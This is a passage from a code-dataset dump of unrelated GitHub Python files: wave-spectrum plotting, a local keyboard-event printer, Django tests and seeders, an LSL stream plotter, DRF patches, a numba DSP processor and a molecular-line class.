\"\"\"Loop for each time.\"\"\"\n\n # create folder if it does not exist\n os.system(f\"mkdir -p {self.folder}\")\n\n for i in range(len(self.time)):\n fig, *ax = self.make_plot(i)\n figname = f\"{self.folder}/{self.time[i].strftime('%Y%m%d%H%M')}.png\"\n fig.savefig(figname, dpi=100)\n print(f\"Plotting file ---> {figname}\")\n plt.close()\n\n c = f\"convert {self.folder}/*.png -delay 100 -quality 50 {self.folder}/movie.gif\"\n os.system(c)\n # ffmpeg -i movie.gif -movflags faststart -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" movie.mp4\n # ffmpeg -y -framerate 2 -pattern_type glob -i '*.png' -movflags faststart -pix_fmt yuv420p -vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" movie.mp4\n\n\n def time_directional_spectrum(self, fname=None):\n \"\"\"Nice way to visualize the time-varying directional wave spectrum\"\"\"\n\n # determine number of time\n ntime = len(self.time)\n step = np.max((1, int(ntime/50)))\n\n # compute energy components\n dirr = np.radians(self.dirs)\n S = np.trapz(self.E, x=dirr, axis=1).T\n Ex = np.trapz(np.cos(dirr[None,:,None]) * self.E, x=dirr, axis=1).T / S\n Ey = np.trapz(np.sin(dirr[None,:,None]) * self.E, x=dirr, axis=1).T / S\n\n # remove some elements\n ix_remove = np.logical_or(self.wfrq < 0.06, self.wfrq > 0.8)\n Ex[ix_remove] = np.nan\n Ey[ix_remove] = np.nan\n\n # create colormap\n smin, smax = -3, 1\n colors = [\"#FFFFFF\", \"#01DFA5\", \"#FE642E\", \"#08298A\", \"#01A9DB\"]\n cmap = mcolors.LinearSegmentedColormap.from_list('cmap', colors, N=1024)\n norm = mcolors.LogNorm(vmin=10**smin, vmax=10**smax)\n\n # do plot spectrum\n fig, ax = plt.subplots(1, figsize=(7,4))\n ax.set_title(self.title)\n #\n ax.plot(s.time, 1/self.Tp, \".\", ms=3, color=\"0.5\", alpha=0.5)\n pc = ax.pcolormesh(self.time, self.wfrq, S, cmap=cmap, norm=norm)\n qv = ax.quiver(self.time[::step], self.wfrq[::4], Ex[::4,::step], Ey[::4,::step],\n scale=50, angles=\"uv\", color=\"black\")\n\n # plot wind at 0.9 freq\n qw = ax.quiver(self.time[::step], 0.85, self.Ua[::step], self.Va[::step],\n scale=200, width=0.004, headwidth=2.5, angles=\"uv\", color=\"blue\")\n ax.quiverkey(qw, 0.80, 1.02, 10, label=\"$U_{10} = 10\\,\\mathrm{m/s}$\",\n labelpos=\"E\")\n\n # colorbar\n fig.colorbar(pc, ax=ax, cax=colorax(ax))#, ticks=10**np.arange(smin, smax+1))\n\n # tweak the axes\n ax.set_xlim((self.time[0], self.time[-1]+dt.timedelta(minutes=30)))\n ax.set_ylim((0.05, 0.95))\n ax.set_ylabel(\"$f\\,\\mathrm{[Hz]}$\")\n #\n ax.xaxis.set_minor_locator(mdates.HourLocator(range(0,24,3)))\n 
ax.xaxis.set_major_locator(mdates.DayLocator(interval=1))\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b %d\\n%Y\"))\n\n if fname:\n fig.savefig(fname, dpi=600)\n\n return fig, ax\n\n# }}}\n\n\nif __name__ == \"__main__\":\n\n # case when we have a cold front observed by a sar image\n if True:\n t_ini = dt.datetime(2018, 9, 11)\n t_end = dt.datetime(2018, 9, 16)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n # s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_1.png\")\n\n # define initial and final time (no more than 3 or 4 days)\n if True:\n t_ini = dt.datetime(2018, 10, 15)\n t_end = dt.datetime(2018, 10, 20)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_2.png\")\n\n # case when we observed cross-winds and slanting fecth\n if True:\n t_ini = dt.datetime(2018, 11, 9)\n t_end = dt.datetime(2018, 11, 16)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 30)\n s.animate()\n s.time_directional_spectrum(\"./events/spectra_event_3.png\")\n\n # plot specific date only\n if False:\n\n # bomm1-its\n date = dt.datetime(2017, 12, 8, 14, 0)\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_its.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n s.make_plot(i)\n \n # bomm1-per1\n date = dt.datetime(2018, 10, 16, 6, 0)\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n s.make_plot(i)\n\n # terrasar x\n if True:\n \n dates_tsx = [\n '20180713T122722', '20180714T003126', '20180720T000255',\n '20180822T002322', '20180917T122725', '20180928T122726',\n '20181016T002302', '20181020T122727', '20181021T003133',\n '20181112T003131', '20181118T002259'\n ]\n\n for strdate in dates_tsx:\n date = dt.datetime.strptime(strdate, \"%Y%m%dT%H%M%S\")\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n fig, *ax = s.make_plot(i)\n fig.savefig(f\"./terrasarx/{strdate}_10min.png\", dpi=300)\n plt.close(fig)\n\n # sentinel\n if True:\n\n dates_snt = [\n '20180712T003311', '20180805T003313', '20180807T122429',\n '20180817T003314', '20180819T122429', '20180831T122430',\n '20180910T003315', '20180912T122430', '20181023T002513',\n '20181109T003315', '20181111T122431', '20181203T003315',\n '20181205T122430'\n ]\n\n for strdate in dates_snt:\n date = dt.datetime.strptime(strdate, \"%Y%m%dT%H%M%S\")\n t_ini = date - dt.timedelta(days=1)\n t_end = date + dt.timedelta(days=1)\n s = PlotSpectra(\"../../metadata/bomm1_per1.yml\", t_ini, t_end, 10)\n i = np.argmin(abs(s.time - date))\n fig, *ax = s.make_plot(i)\n fig.savefig(f\"./sentinel/{strdate}_10min.png\", dpi=300)\n plt.close(fig)\n","repo_name":"dspelaez/bomm","sub_path":"src/visualization/spectra_animation.py","file_name":"spectra_animation.py","file_ext":"py","file_size_in_byte":16290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12558731267","text":"from pynput import mouse, keyboard\nimport functools\nfrom queue import Queue\n\n\n\n\nclass MouseEvent():\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n \nclass KeyBoardRecoder():\n def __init__(self, event_queue):\n ''' q is event queue '''\n 
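# pynput's keyboard.Listener runs in its own thread: start() returns\n        # immediately, and join() blocks until a callback returns False\n        # (on_release below does so for Esc). The queue is kept for the\n        # callbacks, although they do not use it yet.\n        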
self.event_queue = event_queue\n self.listener = keyboard.Listener(\n on_press=self.on_press,\n on_release=self.on_release\n )\n\n def start(self):\n self.listener.start()\n\n def join(self):\n self.listener.join()\n\n def on_press(self, key):\n try:\n print('alphanumeric key {0} pressed'.format(key.char))\n except AttributeError:\n print('special key {0} pressed'.format(key))\n\n def on_release(self, key):\n print('{0} released'.format(key))\n if key == keyboard.Key.esc:\n # Stop listener\n return False\n\nif __name__ == \"__main__\":\n q = Queue()\n keyboard_recoder = KeyBoardRecoder(q)\n keyboard_recoder.start()\n keyboard_recoder.join()","repo_name":"osljw/workspace","sub_path":"workspace_python/simulation/listen_keyboard.py","file_name":"listen_keyboard.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34342122549","text":"import pytest\nimport tablib\n\nfrom backend.models import Site\nfrom backend.models.widget import SiteWidget, SiteWidgetList, SiteWidgetListOrder\nfrom backend.resources.site_homepage_widgets import SiteHomepageWidgetsResource\nfrom backend.tests import factories\n\n\n@pytest.mark.skip(\"Tests are for initial migration only\")\nclass TestSiteHomepageWidgetsImport:\n @staticmethod\n def build_table(data: list[str]):\n headers = [\n \"id,created,created_by,last_modified,last_modified_by,title,slug,visibility,language,contact_email,\"\n \"homepage_widgets\",\n ]\n table = tablib.import_set(\"\\n\".join(headers + data), format=\"csv\")\n return table\n\n @pytest.mark.django_db\n def test_import_base_data(self):\n site = factories.SiteFactory.create()\n user1 = factories.UserFactory.create()\n user2 = factories.UserFactory.create()\n widget1 = factories.SiteWidgetFactory.create(site=site)\n widget2 = factories.SiteWidgetFactory.create(site=site)\n\n data = [\n f\"{str(site.id)},2023-02-02 21:21:10.713,{user1.email},2023-02-02 21:21:39.864,{user2.email},Sample site \"\n f'title,sample-site-slug,Public,,test@email.com,\"{str(widget1.id)},{str(widget2.id)}\"',\n ]\n table = self.build_table(data)\n\n assert site.homepage is None\n assert len(SiteWidget.objects.all()) == 2\n assert len(SiteWidgetList.objects.all()) == 0\n assert len(SiteWidgetListOrder.objects.all()) == 0\n\n result = SiteHomepageWidgetsResource().import_data(dataset=table)\n\n assert not result.has_errors()\n assert not result.has_validation_errors()\n assert result.totals[\"update\"] == len(data)\n site = Site.objects.get(id=table[\"id\"][0])\n assert site.homepage is not None\n\n assert (\n SiteWidgetListOrder.objects.get(\n site_widget_list=site.homepage, order=0\n ).site_widget\n == widget1\n )\n assert (\n SiteWidgetListOrder.objects.get(\n site_widget_list=site.homepage, order=1\n ).site_widget\n == widget2\n )\n\n assert site.homepage.widgets.count() == 2\n assert len(SiteWidget.objects.all()) == 2\n assert len(SiteWidgetList.objects.all()) == 1\n assert len(SiteWidgetListOrder.objects.all()) == 2\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/tests/test_resources/test_site_homepage_widgets.py","file_name":"test_site_homepage_widgets.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"14128652862","text":"# %%\n\"\"\"\nReceiveAndPlot example for LSL\nThis example shows data from all found outlets in realtime.\nIt illustrates the following use cases:\n- 
efficiently pulling data, re-using buffers\n- automatically discarding older samples\n- online postprocessing\n\"\"\"\n\nimport math\nimport sys\nfrom typing import List\n\nimport numpy as np\nimport pylsl\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtWidgets\n\n# %%\n\n# Basic parameters for the plotting window\nplot_duration = 10 # how many seconds of data to show\nupdate_interval = 30 # ms between screen updates\npull_interval = 20 # ms between each pull operation\n\n# Define axis limits\nylims = None # auto-range\n# ylims = (-1, 1) # fixed range\n\n# Name of a single stream to plot (optional)\nsingle_stream_name = ''\n# single_stream_name = 'UN-2019.07.77_filtered'\n\n# A specific string to search for in the stream names (optional)\nstream_str = ''\n# stream_str = 'UN'\n\n# Choose to set the axis limits for a specific stream\nlim_name = ''\n\n\nclass Inlet:\n \"\"\"\n Base class to represent a plottable inlet\n \"\"\"\n\n def __init__(self, info: pylsl.StreamInfo):\n # create an inlet and connect it to the outlet we found earlier.\n # max_buflen is set so data older the plot_duration is discarded\n # automatically and we only pull data new enough to show it\n\n # Also, perform online clock synchronization so all streams are in the\n # same time domain as the local lsl_clock()\n # (see https://labstreaminglayer.readthedocs.io/projects/liblsl/ref/enums.html#_CPPv414proc_clocksync)\n # and dejitter timestamps\n self.inlet = pylsl.StreamInlet(\n info,\n max_buflen=plot_duration,\n processing_flags=pylsl.proc_clocksync | pylsl.proc_dejitter,\n )\n # store the name and channel count\n self.name = info.name()\n self.channel_count = info.channel_count()\n self.channel_names = [\n 'Channel ' + str(i + 1) for i in range(self.channel_count)\n ]\n # Only the first 8 channels are data channels in Unicorn\n if 'un' in self.name.lower() or self.channel_count == 17:\n self.channel_count = 8\n self.channel_names = ['Fz', 'C3', 'Cz', 'C4', 'Pz', 'PO7', 'Oz', 'PO8']\n self.color_cycle = [\n '8dd3c7',\n 'feffb3',\n 'bfbbd9',\n 'fa8174',\n '81b1d2',\n 'fdb462',\n 'b3de69',\n 'bc82bd',\n 'ccebc4',\n 'ffed6f',\n ]\n\n def pull_and_plot(self, plot_time: float):\n \"\"\"\n Pull data from the inlet and add it to the plot.\n :param plot_time: lowest timestamp that's still visible in the plot\n :param plt: the plot the data should be shown on\n \"\"\"\n # We don't know what to do with a generic inlet, so we skip it.\n # It will be defined in the sub-classes\n pass\n\n\nclass DataInlet(Inlet):\n \"\"\"\n A DataInlet represents an inlet with continuous, multi-channel data that\n should be plotted as multiple lines.\n \"\"\"\n\n dtypes = [[], np.float32, np.float64, None, np.int32, np.int16, np.int8, np.int64]\n\n def __init__(self, info: pylsl.StreamInfo, win: pg.GraphicsLayoutWidget):\n super().__init__(info)\n\n self.win = win\n\n # calculate the size for our buffer, i.e. 
two times the displayed data\n bufsize = (\n 2 * math.ceil(info.nominal_srate() * plot_duration),\n info.channel_count(),\n )\n self.buffer = np.empty(bufsize, dtype=self.dtypes[info.channel_format()])\n empty = np.array([])\n # create one curve object for each channel/line that will handle displaying the data\n self.curves = [\n pg.PlotCurveItem(\n x=empty,\n y=empty,\n # autoDownsample=True,\n pen=pg.mkPen(self.color_cycle[i % len(self.color_cycle)], width=1),\n )\n for i in range(self.channel_count)\n ]\n\n offset = 0\n tmp = win.getItem(row=offset, col=0)\n while tmp is not None:\n offset = offset + 1\n tmp = self.win.getItem(row=offset, col=0)\n\n for i, curve in enumerate(self.curves):\n i_new = i + offset\n tmp_plt = self.win.addPlot(row=i_new, col=0, name=str(i))\n tmp_plt.setClipToView(True)\n tmp_plt.setDownsampling(mode='peak')\n tmp_plt.addItem(item=curve)\n tmp_plt.enableAutoRange(axis='x', enable=True)\n tmp_plt.setLabel('right', self.channel_names[i])\n tmp_plt.getAxis('right').setTicks([[]])\n if ylims is not None:\n if lim_name == '':\n tmp_plt.setRange(yRange=ylims)\n else:\n if lim_name.lower() in self.name.lower():\n tmp_plt.setRange(yRange=ylims)\n if i_new > offset:\n tmp_plt.setXLink(str(i_new - 1))\n if i == 0:\n tmp_plt.setTitle(self.name)\n if i != len(self.curves) - 1:\n tmp_plt.getAxis('bottom').setTicks([[]])\n\n def pull_and_plot(self, plot_time):\n # pull the data\n _, ts = self.inlet.pull_chunk(\n timeout=0.0, max_samples=self.buffer.shape[0], dest_obj=self.buffer\n )\n # ts will be empty if no samples were pulled, a list of timestamps otherwise\n if ts:\n ts = np.asarray(ts)\n y = self.buffer[0 : ts.size, :]\n this_x = None\n old_offset = 0\n new_offset = 0\n for ch_ix in range(self.channel_count):\n # we don't pull an entire screen's worth of data, so we have to\n # trim the old data and append the new data to it\n old_x, old_y = self.curves[ch_ix].getData()\n # the timestamps are identical for all channels, so we need to # do this calculation only once\n if ch_ix == 0:\n # find the index of the first sample that's still visible,\n # i.e. 
newer than the left border of the plot\n old_offset = old_x.searchsorted(plot_time)\n # same for the new data, in case we pulled more data than\n # can be shown at once\n new_offset = ts.searchsorted(plot_time)\n # append new timestamps to the trimmed old timestamps\n this_x = np.hstack((old_x[old_offset:], ts[new_offset:]))\n # append new data to the trimmed old data\n this_y = np.hstack((old_y[old_offset:], y[new_offset:, ch_ix] - ch_ix))\n # replace the old data\n self.curves[ch_ix].setData(this_x, this_y)\n\n\nclass MarkerInlet(Inlet):\n \"\"\"\n A MarkerInlet shows events that happen sporadically as vertical lines\n \"\"\"\n\n def __init__(self, info: pylsl.StreamInfo, win: pg.GraphicsLayoutWidget):\n super().__init__(info)\n self.win = win\n\n i = 0\n tmp = win.getItem(row=i, col=0)\n while tmp is not None:\n i = i + 1\n tmp = self.win.getItem(row=i, col=0)\n\n self.plt = self.win.addPlot(row=i, col=0, name='markers')\n self.plt.setLabel('right', 'Markers')\n self.plt.getAxis('right').setTicks([[]])\n self.plt.getAxis('left').setTicks([[]])\n\n if i > 0:\n self.plt.setXLink(str(i - 1))\n self.win.getItem(row=i - 1, col=0).getAxis('bottom').setTicks([[]])\n\n def pull_and_plot(self, plot_time):\n # TODO: purge old markers\n strings, timestamps = self.inlet.pull_chunk(0)\n if timestamps:\n for string, ts in zip(strings, timestamps):\n self.plt.addItem(\n pg.InfiniteLine(ts, angle=90, movable=False, label=string[0])\n )\n\n\ndef scroll():\n \"\"\"\n Move the view so the data appears to scroll\n \"\"\"\n # We show data only up to a timepoint shortly before the current time\n # so new data doesn't suddenly appear in the middle of the plot\n fudge_factor = pull_interval * 0.5\n plot_time = pylsl.local_clock()\n plt.setXRange(plot_time - plot_duration + fudge_factor, plot_time - fudge_factor)\n\n\ndef update():\n # Read data from the inlet. 
Use a timeout of 0.0 so we don't block GUI interaction.\n mintime = pylsl.local_clock() - plot_duration\n # call pull_and_plot for each inlet.\n # Special handling of inlet types (markers, continuous data) is done in\n # the different inlet classes.\n for inlet in inlets:\n inlet.pull_and_plot(mintime)\n\n\ndef get_stream_infos():\n print(\"Looking for streams...\")\n\n # If there is a specific stream to be looked for\n if single_stream_name != '':\n # Specificially search for it\n infos = pylsl.resolve_byprop('name', single_stream_name)\n\n else:\n num_streams = 0\n\n # Stay in the while loop until streams are found\n while num_streams == 0:\n # Resolve all available LSL streams\n infos = pylsl.resolve_streams()\n num_streams = len(infos)\n\n # If there is a string to search for in the stream names\n if stream_str != '':\n # Filter out the streams with names without this string\n infos = [info for info in infos if stream_str in info.name()]\n\n # Sort the streams based on the stream type\n # --> marker streams at the end of the list\n infos.sort(key=lambda info: 'marker' in info.name().lower())\n\n return infos\n\n\ndef get_inlets(infos, win):\n # Initialize an empty list for the stream inlets\n inlets: List[Inlet] = []\n\n # Iterate over found streams, creating specialized inlet objects that will\n # handle plotting the data\n for info in infos:\n if 'marker' in info.type().lower():\n if (\n info.nominal_srate() != pylsl.IRREGULAR_RATE\n or info.channel_format() != pylsl.cf_string\n ):\n print('Invalid marker stream ' + info.name())\n print('Adding marker inlet: ' + info.name())\n inlets.append(MarkerInlet(info, win))\n elif (\n info.nominal_srate() != pylsl.IRREGULAR_RATE\n and info.channel_format() != pylsl.cf_string\n ):\n print('Adding data inlet: ' + info.name())\n inlets.append(DataInlet(info, win))\n else:\n print('Don\\'t know what to do with stream ' + info.name())\n\n return inlets\n\n\nif __name__ == '__main__':\n # Get a list of available LSL stream infos\n infos = get_stream_infos()\n\n # Create the pyqtgraph window\n win = pg.GraphicsLayoutWidget(show=True, title='LSL Data Stream')\n view = pg.widgets.RemoteGraphicsView.RemoteGraphicsView()\n pg.setConfigOptions(antialias=True)\n\n # Get a list of LSL inlets\n inlets = get_inlets(infos, win)\n\n # Get the first subplot for synchronizing with other subplots\n plt = win.getItem(row=0, col=0)\n\n # vb = win.addViewBox(row=0, col=0, colspan=inlets[0].channel_count)\n\n # Create a timer that will move the view every update_interval ms\n update_timer = QtCore.QTimer()\n update_timer.timeout.connect(scroll)\n update_timer.start(update_interval)\n\n # Create a timer that will pull and add new data occasionally\n pull_timer = QtCore.QTimer()\n pull_timer.timeout.connect(update)\n pull_timer.start(pull_interval)\n\n # Start Qt event loop unless running in interactive mode or using pyside\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtWidgets.QApplication.instance().exec_()\n\n# %%\n","repo_name":"StarikovaA/PBSM","sub_path":"online_pr/eye_bklinking_detection/plot_lsl_stream.py","file_name":"plot_lsl_stream.py","file_ext":"py","file_size_in_byte":11650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10125900640","text":"from logging.config import dictConfig\n\nlogging_config = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"standard\": {\"format\": \"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"}\n 
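# the handlers/root entries below attach a single stdout StreamHandler at\n    # INFO, so every logger emits \"time [LEVEL] name: message\" lines once\n    # dictConfig(logging_config) runs\n    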
},\n    \"handlers\": {\n        \"default\": {\n            \"level\": \"INFO\",\n            \"formatter\": \"standard\",\n            \"class\": \"logging.StreamHandler\",\n            \"stream\": \"ext://sys.stdout\",\n        }\n    },\n    \"root\": {\"handlers\": [\"default\"], \"level\": \"INFO\", \"propagate\": False},\n}\n\ndictConfig(logging_config)\n\n\nclass Config:\n    CITY = \"Kyiv\"\n    APPLICATION_X_TOKEN = \"asjdh98as7agejh325l4359ta1ysfdof\"\n\n    WEATHER_API_KEY = \"\"\n    UNITS = \"metric\"\n\n    DATABASE_NAME = \"database.db\"\n    TABLE_NAME = \"temperature\"\n","repo_name":"TetianaHrunyk/weather-microservice","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"5958178732","text":"\n# Maps formats to Pillow's accepted image formats\nMAPPING = {\n    'jpg': 'JPEG',\n    'jpeg': 'JPEG',\n    'gif': 'GIF',\n    'png': 'PNG',\n    'pdf': 'PDF',\n    'tif': 'TIFF',\n    'tiff': 'TIFF',\n    'webp': 'WEBP'\n}\n\nEXTENSIONS = {\n    'JPEG': 'jpg',\n    'GIF': 'gif',\n    'PNG': 'png',\n    'PDF': 'pdf',\n    'TIFF': 'tif',\n    'BMP': 'bmp',\n    'WEBP': 'webp'\n}\n","repo_name":"ui/da-vinci","sub_path":"da_vinci/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}{"seq_id":"23783434238","text":"from django.core.management.base import BaseCommand\nimport faker\nfrom django_seed import Seed\n\nfrom workers.models import CompanyStructure, Employees, SalaryInformation\n\n\nclass Command(BaseCommand):\n    help = 'Populate the database with test data'\n\n    def handle(self, *args, **options):\n        fake = faker.Faker('ru_RU')\n        seeder = Seed.seeder('ru_RU')\n\n        if CompanyStructure.objects.count() < 5:\n            y = (i for i in range(1, 6))\n            seeder.add_entity(CompanyStructure, 5,\n                              {\n                                  'name': lambda x: fake.word(\n                                      ext_word_list=('отдел', 'отделение', 'управление', 'цех', 'служба')),\n                                  'level_number': lambda x: next(y),\n                              }\n                              )\n\n        seeder.add_entity(Employees, 10, {\n            'fullname': lambda x: fake.name(),\n            'position': lambda x: fake.job(),\n            'employment_date': lambda x: fake.date(),\n            'salary': lambda x: fake.pydecimal(positive=True, right_digits=2, max_value=2000),\n            'manager': lambda x: Employees.objects.last(),\n            'level': lambda x: CompanyStructure.objects.order_by(\"?\")[0],\n            'email': lambda x: fake.unique.email(),\n        })\n\n        seeder.add_entity(SalaryInformation, 100, {\n            'employee': lambda x: Employees.objects.order_by(\"?\")[0],\n            'paid_out': lambda x: fake.pydecimal(positive=True, right_digits=2, max_value=2000),\n            'date_paid': lambda x: fake.date(),\n\n        })\n        seeder.execute()\n","repo_name":"foreverYoungforeverDrunk/rd_site","sub_path":"workers/management/commands/db_seeder.py","file_name":"db_seeder.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"25297602863","text":"import numpy as np\nfrom numba import guvectorize\nfrom pygama.dsp.errors import DSPFatal\n\n@guvectorize([\"void(float32[:], float32, float32[:])\",\n              \"void(float64[:], float64, float64[:])\"],\n             \"(n),()->()\", nopython=True, cache=True)\ndef fixed_time_pickoff(w_in, t_in, a_out):\n    \"\"\"\n    Pick off the waveform value at the provided index. 
If the\n provided index is out of range, return NaN.\n\n Parameters\n ----------\n w_in : array-like\n The input waveform\n t_in : int\n The waveform index to pick off\n a_out: float\n The output pick-off value\n\n Processing Chain Example\n ------------------------\n \"trapEftp\": {\n \"function\": \"fixed_time_pickoff\",\n \"module\": \"pygama.dsp.processors\",\n \"args\": [\"wf_trap\", \"tp_0+10*us\", \"trapEftp\"],\n \"unit\": \"ADC\",\n \"prereqs\": [\"wf_trap\", \"tp_0\"]\n }\n \"\"\"\n a_out[0] = np.nan\n\n if np.isnan(w_in).any() or np.isnan(t_in):\n return\n\n if np.floor(t_in) != t_in:\n raise DSPFatal('The pick-off index must be an integer')\n\n if int(t_in) < 0 or int(t_in) >= len(w_in):\n return\n \n a_out[0] = w_in[int(t_in)]\n","repo_name":"emmaeline/pygama","sub_path":"pygama/dsp/_processors/fixed_time_pickoff.py","file_name":"fixed_time_pickoff.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"40038100863","text":"import base64\nimport marshal\n\nfrom django.core.exceptions import ValidationError as DjangoValidationError\nfrom rest_framework import request, fields\nfrom rest_framework.exceptions import ValidationError\n\nfrom .parsers import CamelCaseQueryStringParser\n\n\n# Patching rest_framework Request in order to allow querystring params camelcase conversion\n@property\ndef query_params(self):\n \"\"\"\n Camel case converter for querystring\n \"\"\"\n if not hasattr(self, '__query_params'):\n self.__query_params = CamelCaseQueryStringParser.parse(self._request)\n return self.__query_params\n\n\ndef patch_request():\n request.Request.patched_query_params = request.Request.query_params\n request.Request.query_params = query_params\n\n\n# Patching rest_framework Field, in order to intercept validation code for handling proper response output\ndef pack_validation_message(message, code, case=None, data=None):\n return base64.b64encode(marshal.dumps((str(message), code, case, data)))\n\n\ndef unpack_validation_message(packed_message):\n try:\n msg, code, case, data = marshal.loads(base64.b64decode(packed_message))\n return code, case, msg, data\n except (TypeError, base64.binascii.Error):\n return None, None, packed_message, None\n\n\ndef field_fail(self, key, **kwargs):\n \"\"\"\n Attaches extra validation code to the message\n \"\"\"\n try:\n self.patched_fail(key, **kwargs)\n except ValidationError as e:\n if isinstance(e.detail, list):\n e.detail = [pack_validation_message(m, key, getattr(e, 'case', None)) for m in e.detail]\n raise\n\n\ndef field_run_validators(self, value):\n \"\"\"\n Attaches extra validation code to the messages\n \"\"\"\n errors = []\n for validator in self.validators:\n if hasattr(validator, 'set_context'):\n validator.set_context(self)\n\n try:\n validator(value)\n except ValidationError as exc:\n if isinstance(exc.detail, dict):\n raise\n\n if isinstance(exc.detail, str):\n exc.detail = pack_validation_message(exc.detail,\n getattr(validator, 'code', None),\n getattr(exc, 'case', None))\n\n errors.extend(exc.detail)\n except DjangoValidationError as exc:\n errors.extend([pack_validation_message(m, exc.code) for m in exc.messages])\n if errors:\n raise ValidationError(errors)\n\n\ndef patch_base_field():\n fields.Field.patched_fail = fields.Field.fail\n fields.Field.fail = field_fail\n fields.Field.patched_run_validators = fields.Field.run_validators\n fields.Field.run_validators = 
field_run_validators\n","repo_name":"miphreal/drf-tweaks","sub_path":"drf_proj/apps/base_api/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"15055032523","text":"pares=0\nimpares=0\nx=1\nn=int(input(\"how many numbers will be entered\"))\nwhile x<=n:\n    valor=int(input(\"enter the value\"))\n    if valor%2==0:\n        pares=pares+1\n    else:\n        impares=impares+1\n    x=x+1\nprint(\"number of even values\",pares)\nprint(\"number of odd values\",impares)\n\n \n \n \n","repo_name":"JuanesFranco/Fundamentos-De-Programacion","sub_path":"sesion-05/ejercicio 38.py","file_name":"ejercicio 38.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12479123493","text":"import os, sys\nimport time\nimport numpy as np\nfrom matplotlib.pylab import *\nimport pyopencl as cl\nimport pyopencl.array as cl_array\n#import healpy\nfrom scipy.interpolate import interp1d\nimport pickle\n## from MoleculeO import *\n\n\nC_LIGHT = 2.99792458e10\nAMU = 1.6605e-24 \nH_K = 4.799243348e-11\nBOLTZMANN = 1.3806488e-16\nSTEFAN_BOLTZMANN = 5.670373e-5\nPLANCK = 6.62606957e-27 \nGRAV = 6.673e-8\nPARSEC = 3.0857e18\nELECTRONVOLT = 1.6022e-12\nAU = 149.597871e11\nRSUN = 6.955e10\nMSUN = 1.9891e33\nARCSEC_TO_RADIAN = 4.8481368e-06\nARCSEC_TO_DEGREE = 1.0/3600.0\n\n\n\n\nclass MoleculeO: \n    WEIGHT = 0.0\n    TRANSITIONS = 0\n    LEVELS = 0\n    A = []\n    B = [] \n    BB = []\n    E = []\n    F = []\n    G = []\n    GG = []\n    TRANSITION = []\n    LEVEL = []\n    NAME = ''\n    PARTNERS = 0\n\n    \n    def L2T(self, upper, lower):\n        \"\"\"\n        Returns the index of the transition;\n        returns a value<0 if this is not a valid transition.\n        NOTE: nothing can be assumed about the order in which transitions are\n        stored in the TRANSITION array.\n        \"\"\"\n        for tr in range(self.TRANSITIONS):\n            if ((self.TRANSITION[tr,0]==upper)&(self.TRANSITION[tr,1]==lower)):\n                return tr\n        return -1 \n    \n    \n    def T2L(self, tr):\n        \"\"\"\n        Return level indices (upper, lower) for the transition number tr.\n        Returns -1 if the transition is not found.\n        \"\"\"\n        if ((tr<0)|(tr>=self.TRANSITIONS)): return -1\n        return self.TRANSITION[tr,:]\n
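    # Illustrative round trip between levels and transitions (the existence of\n    # a (1->0) transition after Read() is an assumption of the example):\n    #   tr   = MOL.L2T(1, 0)    # transition index, or -1 if not found\n    #   u, l = MOL.T2L(tr)      # recovers the level pair (1, 0)\n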
